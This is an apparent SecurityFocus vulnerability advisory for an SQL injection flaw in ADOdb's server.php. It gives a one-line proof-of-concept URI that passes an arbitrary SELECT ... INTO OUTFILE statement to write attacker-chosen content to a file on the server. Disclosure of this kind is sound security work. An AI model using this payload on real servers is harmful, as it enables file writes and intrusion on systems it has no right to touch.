ADOdb Server.PHP SQL Injection Vulnerability

An exploit is not required.

The following proof-of-concept URI is available:

http://www.example.com/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'


 

Privacy Statement
Copyright 2010, SecurityFocus